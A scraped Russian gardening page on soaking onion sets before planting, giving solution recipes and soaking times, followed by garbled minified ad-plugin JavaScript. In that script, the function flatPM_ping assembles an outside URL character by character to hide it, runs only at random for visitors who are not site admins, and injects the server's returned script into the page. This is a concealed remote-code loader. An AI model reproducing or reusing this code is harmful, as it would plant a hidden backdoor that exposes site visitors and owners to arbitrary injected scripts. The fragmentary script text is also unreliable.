Раствор марганца 40 грамм на 10 литров 2,5 – 3 часа
Медный купорос 30-40 грамм на 10 литров 30 минут
«Фитоспорин»
Комплексное удобрение для овощных культур 1 столовая ложка на 10 литров 8 – 10 часов
Селитровый раствор 1 чайная ложка селитры на 70 литров 15 минут
Раствор «Эпин-Экстра» 1 мл на 2 литра воды 24 часа
Раствор «Максим» 4 мл на 2 литра воды 30 минут
Раствор древесной золы 2-3 стакана на 10 литров 2 часа

Для замачивания севка в горячей воде, растворе марганца или селитры для удобства извлечения луковицы помещают в сетку или капроновый чулок. После замачивания лук перед посадкой обязательно нужно промыть чистой водой.

Маленькие секреты:

  • луковки, которые всплыли при замачивании, к посадке не пригодны;
  • крупные луковицы вырастут из посадочного материала, в котором проросли все корешки на донце;
  • лук с частично проросшими корнями высаживают на зеленое перо.

Ситуации, в которых замачивание лука севка обязательно

В определенных условиях, когда луковицы хранились всю зиму при постоянной температуре в помещении выше 18 градусов, правильно соблюдается севооборот и есть 100 % уверенность, что посадочный материал чистый и ничем не заражен, то процесс замачивания перед посадкой можно пропустить.

Но существуют ситуации, когда замачивание луковиц нужно обязательно включать в предпосадочную обработку:

  1. Хранение при низких температурах. В результате стимулируется формирование цветочных почек, такой лук будет активно стрелковаться.
  2. Покупка посадочного материала в магазине или на рынке. Неизвестно в каких условиях выращивался и хранился такой лук, не было ли в посадках болезней и вредителей. В этом случае лучше провести профилактические мероприятия в виде замачивания луковиц, чем потом разбираться с возможными проблемами при выращивании.
  3. Нет возможности соблюдать севооборот. Ежегодная посадка луковичных культур на одном и том же месте может быть причиной заражения луковиц личинками луковой мухи или возбудителями бактериальных заболеваний.
  4. В посевах лука в прошлом году была замечена луковая муха. Замачивание лука севка в солевом или другом обеззараживающем растворе является эффективным средством избавления от личинок луковой мухи без применения инсектицидов.

Если лук севок правильно замочить даже в простой соленой воде, это все равно будет замечательным подспорьем в получении большого урожая крупных здоровых луковиц .

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};